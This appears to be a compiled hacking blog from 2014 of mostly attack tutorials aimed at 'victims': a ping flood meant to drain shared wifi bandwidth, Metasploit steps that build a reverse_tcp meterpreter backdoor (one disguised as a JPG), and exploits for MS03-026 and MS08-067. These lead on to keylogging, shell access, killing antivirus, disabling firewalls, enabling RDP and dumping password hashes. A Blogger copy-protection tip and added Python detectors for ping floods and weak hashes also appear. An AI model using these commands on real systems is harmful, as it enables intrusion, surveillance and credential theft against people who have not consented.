Monday, 16 June 2014

How to Hack Wifi Using CMD


1. Open CMD: click Start -> All Programs -> Command Prompt.
2. Once the CMD window is open, type the command ipconfig /all.
3. Then look for the target DNS server; see the screen below.

So our target this time is 10.0.1.2

4. Now type the command ping -l 500 10.0.1.2 -t and press Enter: 10.0.1.2 is your target, so replace it with your victim's DNS server.
5. After that, a screen like the one below will appear

This method is meant to drain the bandwidth of the users who are on the network around that hotspot.

In ping -l 500 10.0.1.2 -t you can also change the 500 to 1000 or more, but don't overdo it; have some pity on the other users.
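What the receiving side sees of this procedure is a steady stream of oversized ICMP echo requests from one host, which is easy to spot in a firewall log. The following added example (not part of the original post) does that over constructed lines in the Windows Firewall pfirewall.log format; the thresholds are assumptions to tune for your own network.

```python
"""Flag hosts sending a sustained stream of oversized ICMP echo requests.

Added example, not from the original post. It reads lines in the Windows
Firewall log format (pfirewall.log, W3C fields) and reports any source that
sends more than MAX_PINGS echo requests within WINDOW seconds with an average
datagram size of at least MIN_SIZE bytes, which is what "ping -l 500 ... -t"
looks like from the receiving side. The log lines below are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime

# pfirewall.log field order (taken from its "#Fields:" header line).
FIELDS = ("date time action protocol src-ip dst-ip src-port dst-port size "
          "tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path").split()

MAX_PINGS = 5   # echo requests per window before a source is flagged (assumed)
WINDOW = 10     # seconds (assumed)
MIN_SIZE = 100  # bytes; a default Windows ping is 60 (32 payload + 28 headers)

# Constructed sample: 10.0.1.50 runs "ping -l 500 10.0.1.2 -t" (528-byte
# datagrams), 10.0.1.77 sends one ordinary ping, and one TCP line is ignored.
SAMPLE_LOG = """#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2014-06-16 10:00:00 ALLOW ICMP 10.0.1.50 10.0.1.2 - - 528 - - - - 8 0 - RECEIVE
2014-06-16 10:00:01 ALLOW ICMP 10.0.1.50 10.0.1.2 - - 528 - - - - 8 0 - RECEIVE
2014-06-16 10:00:01 ALLOW ICMP 10.0.1.77 10.0.1.2 - - 60 - - - - 8 0 - RECEIVE
2014-06-16 10:00:02 ALLOW ICMP 10.0.1.50 10.0.1.2 - - 528 - - - - 8 0 - RECEIVE
2014-06-16 10:00:02 ALLOW TCP 10.0.1.77 10.0.1.2 49200 53 52 S 1 0 8192 - - - RECEIVE
2014-06-16 10:00:03 ALLOW ICMP 10.0.1.50 10.0.1.2 - - 528 - - - - 8 0 - RECEIVE
2014-06-16 10:00:04 ALLOW ICMP 10.0.1.50 10.0.1.2 - - 528 - - - - 8 0 - RECEIVE
2014-06-16 10:00:05 ALLOW ICMP 10.0.1.50 10.0.1.2 - - 528 - - - - 8 0 - RECEIVE
"""


def parse_line(line):
    """Return a dict of fields for a data line, or None for header/blank/short lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def find_ping_floods(log_text, max_pings=MAX_PINGS, window=WINDOW, min_size=MIN_SIZE):
    """Return {src_ip: (count, avg_size)} for sources exceeding the thresholds.

    A per-source sliding window of timestamps is kept; the source is flagged as
    soon as more than `max_pings` echo requests fall inside `window` seconds.
    """
    recent = defaultdict(deque)   # src-ip -> timestamps inside the window
    sizes = defaultdict(list)     # src-ip -> datagram sizes of its echo requests
    flagged = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["protocol"] != "ICMP" or rec["icmptype"] != "8":
            continue              # only ICMP echo requests (type 8) matter here
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        src = rec["src-ip"]
        q = recent[src]
        q.append(ts)
        sizes[src].append(int(rec["size"]))
        while (ts - q[0]).total_seconds() > window:   # drop timestamps that aged out
            q.popleft()
        avg = sum(sizes[src]) / len(sizes[src])
        if len(q) > max_pings and avg >= min_size:
            flagged[src] = (len(q), avg)
    return flagged


if __name__ == "__main__":
    for src, (n, avg) in find_ping_floods(SAMPLE_LOG).items():
        print(f"{src}: {n} echo requests in {WINDOW}s, avg {avg:.0f} bytes")
```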

Monday, 9 June 2014

Hacking Metasploit Tutorial

--- The Metasploit Framework ---


Note: This is an advanced topic. Read carefully. Feel free to ask any kind of queries; we are always here to help you.

If you are really interested in network security, chances are you have heard of Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC just by knowing your IP? Here's the answer. He could 0wN you, or in other words, he could have full access to your PC, provided you have just a few security loopholes, which may arise for a reason as simple as not updating your Flash player last week when it prompted you to.
Metasploit is a hacker's best friend, mainly because it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic of Metasploit is very vast in itself. However, I'll try to keep it basic and simple so that it can be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack).
In this tutorial, I'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of the Metasploit Framework, let me give you a little idea of some basic terms (they may seem boring at first, but you must know them):

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited, resulting in notable damage.
Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: An error caused when a program tries to store data beyond its allocated size. May be used by an attacker to execute malicious code.
Payload: The actual code which runs on the compromised system after exploitation.
Now, what IS Metasploit?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, and it can also be used to write our own 0-day exploits.



METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of anti-forensics tools, making forensic analysis of the compromised computer a little more difficult. They are released as part of MAFIA (Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer and Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because it is effective and powerful from a pentester's point of view. Another advantage of this mode is that several sessions of msfconsole can be run simultaneously.
I would recommend doing the following things in Metasploit on Backtrack (a system install or a VM image), avoiding the Windows version of the tool.
For those who don't know, Backtrack is a Linux distro made especially for security professionals, including all the tools required by a pentester.
Download Backtrack from here. You can download the ISO or the VMware image, whichever you're comfortable with. If you have physical access to more than one system, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.
The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~#/etc/init.d/wicd start
to start the wicd manager
Finally, type "startx" to start the GUI mode:
root@bt:~#startx

First of all, know your local IP. Open up a konsole (on the bottom left of the taskbar) and type in:
root@bt:~#ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now have a shell, something similar to a command prompt in Windows.
msf >
Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST="your local ip" LPORT="any port you wish" x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier, and for the port you could select 4444.
(Everything has to be entered without quotes)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.
Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.
Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444
All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now the payload handler is listening for all incoming connections on port 4444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011
You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps
Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >
Type in the following:
meterpreter > use priv
Now, if you want to start the keylogger on the victim, just type keyscan_start.
If you want a command shell on the victim's computer,
just type shell:
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
You now have a command prompt.
Type in whoami to see the victim's computer name:
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>
Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let's say the victim has typed something on his computer.
Just type exit to return to meterpreter.
Now type keyscan_dump to see all the typed keystrokes:
meterpreter > keyscan_dump
Dumping captured keystrokes...

How to Disable CTRL+U / CTRL+S

Disabling CTRL+U and CTRL+S is meant to keep our blog safe from people who might copy-paste the articles we write. Admittedly, most people do not like it when their articles are copy-pasted raw, without any change in wording, but there are also those who allow their blog to be copied. Still, I suggest that if you want to write an article, write it in your own words so that it feels more engaging and you can be proud of what you made, and readers will feel more connected to you. For those of you who want to try this tutorial, here is a short explanation of how to disable CTRL+U and CTRL+S to keep your blog safe. Read the tutorial below:

How to Disable CTRL+U / CTRL+S to Keep Your Blog Safe

  • Log in to Blogger.
  • Template - Edit HTML
  • Then find the <body> tag and replace it with the code below:

<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'> 

  • Then save the template!

Notes:
  1. oncontextmenu='return false;' (disables right-click)
  2. onkeydown='return false;' (disables CTRL+A and CTRL+U)
  3. onmousedown='return false;' (disables selecting text in the article)
  4. 'return false;' (turns on each of these JavaScript handlers; if you want to turn one of them off, just replace it with 'return true;')

For blogs/sites containing tutorials with scripts that need to be copied, mazinu suggests using a tag like the one below:

<body oncontextmenu='return true;' onkeydown='return false;' onmousedown='return true;'>

That is all for this article on how to disable CTRL+U / CTRL+S that ogreman can post. But disabling CTRL+U / CTRL+S has no effect on the master bloggers, because they have their own tricks to grab an article another way. So in conclusion, with this method our articles are not 100% safe from the threat of copy-pasting, so with every post mazinu suggests asking the readers of our article to include a source link to our blog if they are going to redistribute what we made, which is usually written in the blog's permalink, like mazinu's below! Hope it is useful.

Metasploit

How to Break into Someone's Computer with Metasploit - Let us learn how to break into someone's computer with Metasploit, here using the Metasploit Framework version 2.6. This application is used to exploit weaknesses in a system or an application. It can be used for penetration testing of Windows, Unix/Linux and MacOS systems, but the most exploitable target is Windows SP1. For more details, read the official website www.metasploit.com.

When I wrote this article, Metasploit had already released version 3.5, but I am using version 2.6, because they are basically the same, except that 3.5 has many more exploits. Oh yes, the Metasploit Framework already comes with many exploits, so there is no need to download them separately. An exploit works by sending a buffer overflow to the victim's system so that we can take over its shell.
Let's get straight to it; here is the installation on Windows.

1. First download it from the official website www.metasploit.com; if version 2.6 is not there, try searching on Google, put in a bit of effort.

2. Then install it and run msfweb.


A shell window like the following will appear.


3. Open a web browser (Internet Explorer, Mozilla, Opera Mini, etc.) and go to http://127.0.0.1:55555; it will look like the following.

Your web GUI may look slightly different, because I have changed the template here.

4. Then find a victim to exploit. You can use NMAP to do a port scan. Here we will try it on a freshly installed (unpatched) Windows Server 2003 system. In the port scan, make sure the MSRPC port is open (default = open). Download NMAP at www.nmap.org

5. Choosing an exploit.
In the Metasploit Web Interface, under FILTER MODULES choose "app :: dcom", then choose the exploit Microsoft RPC DCOM MS03-026.

Choose the target under Select Target

6. Choosing a payload

Pick one of the payloads above; if you are unsure, just pick win32_bind, which exploits the target and drops straight into its command shell. Here are the functions of some payloads:

win32_adduser : adds a user on the victim's system
win32_bind : opens the victim's shell
win32_bind_dllinject : uploads / injects DLL files
win32_bind_meterpreter : exploits by running meterpreter (I like it).
win32_bind_vncinject : injects a VNC server on the victim's system (so we can remote in through vncviewer).
win32_downloadexec : downloads and executes an application on the victim's PC
win32_exec : executes a command on the victim's system.
BIND, PASSIVE and REVERSE are basically the same.


RHOST ==>> the victim's IP address (remote).
LHOST ==>> our IP address (local)
RPORT ==>> the victim's port
LPORT ==>> local open port


Once everything is filled in, click exploit to hack. Hahaha,
good luck trying.

Tuesday, 27 May 2014

Tutor exploits Backtrack 5

Information security is a broad field that involves penetration testing and computer forensics as well. There are so many tools available to perform penetration testing on a target, and Metasploit is one of the best among them. Meterpreter is a powerful feature of Metasploit that uses DLL injection to communicate over the socket. Meterpreter works on the client side by providing a powerful environment to communicate and to transfer files.


A meterpreter session can be established after successfully exploiting the host. Available meterpreter scripts on a metasploit database automate multiple processes, such as:

  • Capture the screen
  • Keylogging
  • File transfer
  • Service detection and more
Even with numerous meterpreter scripts available, you are free to write and to create your own script that is best suited to your work. Some important aspects about the meterpreter script would be:
  • Written in Ruby programming language
  • Located in the metasploit directory
  • Meterpreter scripts are created every day by different authors; click here to check the list.
  • Meterpreter scripts are very helpful to automate the process after compromising the host
  • Meterpreter scripts are based on API and you can get more information here.
There are so many meterpreter scripts that are available publicly for you to use, but if you want to create a new meterpreter script of your own and for public usage, this is readily doable. All you need to do is to follow some rules and regulations so that your script does not conflict with the standard variables. Ruby programming language is a basic need in order to write a script for meterpreter. Other important rules to follow are:
  • Always use description so that the others will understand it
  • Use local variable not global variable
  • Always provide help option for better usage
  • Keep in mind the target host (operating system, service pack (if windows), Kernel (for Unix) ) while creating a script, because all the system’s software does not contain all types of vulnerabilities
Let us consider an example: in our scenario, we need to create an infected file (a backdoor) so that we can send it to the victim. Metasploit needn't be that big of a deal; you can even create a backdoor by using fast-track.

root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 Desktop > test.jpg
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}


As we have typed all the things in, we can automate the process by creating a new script:
root@bt:/pentest/exploits/framework3# touch a.rb
root@bt:/pentest/exploits/framework3# echo 'system("msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 Desktop > test.jpg")' > a.rb
root@bt:/pentest/exploits/framework3# ruby a.rb
root@bt:/pentest/exploits/framework3#

The result is the same. It is also possible to create the jpg file the other way, but this method is faster. Since the time-consuming part is repeating the same steps, why not create a script to do all these jobs automatically? There are different meterpreter scripts available; just look at the picture below.


This is just one small example. Let’s create a script taking advantage of a vulnerability that will exploit an operating system:

root@bt:/pentest/exploits/framework3# touch test.rc
root@bt:/pentest/exploits/framework3# echo use exploit/windows/smb/ms08_067_netapi >> test.rc
root@bt:/pentest/exploits/framework3# echo set RHOST 192.168.1.6 >> test.rc
root@bt:/pentest/exploits/framework3# echo exploit >> test.rc
root@bt:/pentest/exploits/framework3# msfconsole -r test.rc

Beyond this, if we use the manual technique to do the job, then we will need to define:
  • The exploit for this case (well I have used nessus before that is why I know the system is vulnerable to ms08-067-netapi bug)
  • We need to set the remote host manually
  • We need to set local host and port manually
After the execution, the meterpreter session must be active if and only if the operating system is vulnerable, such as in this case:


Now in this meterpreter session, we are able to call different scripts. We can also create our own script as well, as discussed above. Below, I will show you some of the best meterpreter scripts. These are highly useful in the process of penetration testing; however, developers are refining these scripts daily, so be active in the community and on different blogs and forums to keep yourself updated.

Screenspy Script

This is the basic script that will capture the screen of the victim’s computer. All you need to do is type in “run screenspy.” To get help of usage, just type in “run screenspy -h” on the meterpreter screen. After the execution, Firefox will open with a picture of the victim’s computer at that moment.

KillAv Script

Killav is a pretty famous script. As the name suggests, it will kill (close) antivirus software, so if you don't want antivirus software to disturb you, be sure to kill all of it by using this script:

meterpreter > run killav
  [*] Killing Antivirus services on the target...
  meterpreter >

Killav contains the names of most of the better-known anti-virus products, but if there is a new anti-virus, then you will need to edit this script for the best results. Looking in the script file, we can find the well-known anti-virus exe names:
  • winppr32.exe
  • winrecon.exe
  • winservn.exe
  • winssk32.exe
  • winstart.exe
  • winstart001.exe
  • wintsk32.exe
  • winupdate.exe
  • wkufind.exe
  • wnad.exe
  • wnt.exe
  • wradmin.exe
  • wrctrl.exe
  • wsbgate.exe
  • wupdater.exe
  • wupdt.exe
  • wyvernworksfirewall.exe
  • xpf202en.exe
  • zapro.exe
  • zapsetup3001.exe
  • zatutor.exe
  • zonalm2601.exe
  • zonealarm.exe

Getcountermeasure Script

Killav is a powerful script and it can kill a lot of different anti-virus products, but the problem is that when you run killav, Windows may show some types of errors and other alerts, not to mention firewalls. This is remedied by a wonderful script called Getcountermeasure:

meterpreter > run getcountermeasure -h
  Getcountermeasure -- List (or optionally, kill) HIPS and AV
  processes, show XP firewall rules, and display DEP and UAC
  policies

  OPTIONS:

  -d Disable built in Firewall
  -h Help menu.
  -k Kill any AV, HIPS and Third Party Firewall process found.

Just imagine how powerful this script is! It has an ability to fight against Firewall, Anti-virus, IPS and even third party firewall that are so very common nowadays. It is really better than Killav. To use it:

meterpreter > run getcountermeasure -d 

  [*] Running Getcountermeasure on the target...
  [*] Checking for contermeasures...
  [*] Getting Windows Built in Firewall configuration...
  [*]
  [*]     Domain profile configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]     Exception mode = Enable
  [*]
  [*]     Standard profile configuration (current):
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Disable
  [*]     Exception mode = Enable
  [*]
  [*]     Local Area Connection firewall configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]
  [*] Disabling Built in Firewall.....
  [*] Checking DEP Support Policy...
Try to understand the power of this wonderful script: it will remove security logs as well; look at the picture.

Gettelnet script

Telnet is one of the most famous services on the Windows operating system. It allows a remote connection, so if you want to open telnet on the victim's computer for future use, then this is a good script to use. However, as a more advanced option we can use the SSH service for remote connection. We can also install netcat as a backdoor on a compromised host for future connections. Use this command to get more help:
  meterpreter > gettelnet -h

There are a lot of different scripts available, but here we will discuss only the most important ones. These will help you understand the network as well as help you with future connections:
Net Enum - Network Enumeration Script
Netenum is a network enumeration script that is a wonderful script for:
  • Domain Name for DNS Forward Lookup
  • To Perform DNS Forward Lookup on host list and domain
  • The target address range or CIDR identifier
  • To Perform DNS lookup of MX and NS records for a domain
  • To Perform Service Record DNS lookup for a domain
  • To Perform Ping Sweep on IP Range

Checkvm- Check Virtual Machine

Virtual machines are now an important part of enterprise network and most of the large (and even small) networks are using them. Checkvm is a script that will let you monitor the status of the victim, whether on virtual machine or not. It will also let you see the type of virtual machine. Here is the output of this case:

 meterpreter > run checkvm
  [*] Checking if target is a Virtual Machine .....
  [*] This is a Sun VirtualBox Virtual Machine
  meterpreter >

Virus Scan Bypass

Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder, adds it to exclusion list and sets it to run at startup. Though we have discussed two scripts that kill anti-virus protections, it is good to run different scripts to verify your attack.
  
  meterpreter > run virusscan_bypass -h

Enable RDP- Getgui

If you want a graphical user interface of the victim’s computer, then you need to open a service called RDP (remote desktop protocol):
  meterpreter > run getgui -e
  [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
  [*] Carlos Perez carlos_perez@darkoperator.com
  [*] Enabling Remote Desktop
  [*]     RDP is disabled; enabling it ...
  [*] Setting Terminal Services service startup mode

Hashdump

Last but not least: I really don't want to end this article without sharing hashdump, in case you want to keep password hashes from the victim for future use. In some cases, these hashes work on other platforms:

 meterpreter > run hashdump
  [*] Obtaining the boot key...
  [*] Calculating the hboot key using SYSKEY 374d90e7c3ff37a0d6064c461200ca22...
  [*] Obtaining the user list and keys...
  [*] Decrypting user keys...
  [*] Dumping password hashes...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::
Source: http://www.ehacking.net/2012/05/metasploit-meterpreter-scripting.html
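From the defender's side, the user:rid:lmhash:nthash::: lines above are exactly what a password audit reads. The following added example (not from the original article) parses lines in that format and flags accounts with a blank password, whose NT hash is the well-known hash of the empty string shown for Administrator above, and accounts that still store a real LM hash; the sample lines and the two marker constants are taken from the output above.

```python
"""Audit a pwdump-style hash list for weak password storage.

Added example, not from the original article. Each line has the form
user:rid:lmhash:nthash::: as printed by hashdump. An account is reported when
its NT hash is the hash of the empty password (blank password) or when its LM
field is anything other than the "no LM hash" marker (LM storage is weak).
"""
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}

# Sample input: the hashdump output shown above, unchanged.
SAMPLE = """Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::
"""


@dataclass
class Finding:
    user: str
    rid: int
    blank_password: bool
    lm_hash_stored: bool
    note: str


def parse_pwdump_line(line):
    """Split 'user:rid:lm:nt:::' into (user, rid, lm, nt); ValueError if malformed."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError(f"not a pwdump line: {line!r}")
    user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    if len(lm) != 32 or len(nt) != 32:
        raise ValueError(f"hash is not 32 hex characters: {line!r}")
    return user, rid, lm, nt


def audit(dump_text):
    """Return one Finding per account, flagging blank passwords and stored LM hashes."""
    findings = []
    for line in dump_text.splitlines():
        if not line.strip():
            continue
        user, rid, lm, nt = parse_pwdump_line(line)
        findings.append(Finding(
            user=user,
            rid=rid,
            blank_password=(nt == EMPTY_NT),
            lm_hash_stored=(lm != EMPTY_LM),  # real LM hash present: cheap to crack
            note=WELL_KNOWN_RIDS.get(rid, ""),
        ))
    return findings


def risky_accounts(dump_text):
    """Names of the accounts that have a blank password or a stored LM hash."""
    return [f.user for f in audit(dump_text) if f.blank_password or f.lm_hash_stored]


if __name__ == "__main__":
    for f in audit(SAMPLE):
        flags = ("BLANK-PASSWORD " if f.blank_password else "") + \
                ("LM-HASH-STORED" if f.lm_hash_stored else "")
        print(f"{f.user} (RID {f.rid}{', ' + f.note if f.note else ''}): {flags or 'ok'}")
```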